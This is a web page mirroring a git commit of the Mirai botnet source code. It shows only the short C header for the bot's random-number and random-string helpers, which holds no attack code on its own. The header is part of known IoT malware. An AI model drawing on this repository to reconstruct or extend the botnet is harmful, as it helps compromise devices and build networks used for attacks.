1
0
mirror of https://github.com/jgamblin/Mirai-Source-Code synced 2025-12-03 07:18:06 +00:00

Trying to Shrink Size

This commit is contained in:
Jerry Gamblin
2016-10-25 06:08:01 -05:00
commit 9779d43964
77 changed files with 12237 additions and 0 deletions

10
mirai/bot/rand.h Executable file
View File

@@ -0,0 +1,10 @@
#pragma once
#include <stdint.h>
#define PHI 0x9e3779b9
void rand_init(void);
uint32_t rand_next(void);
void rand_str(char *, int);
void rand_alphastr(uint8_t *, int);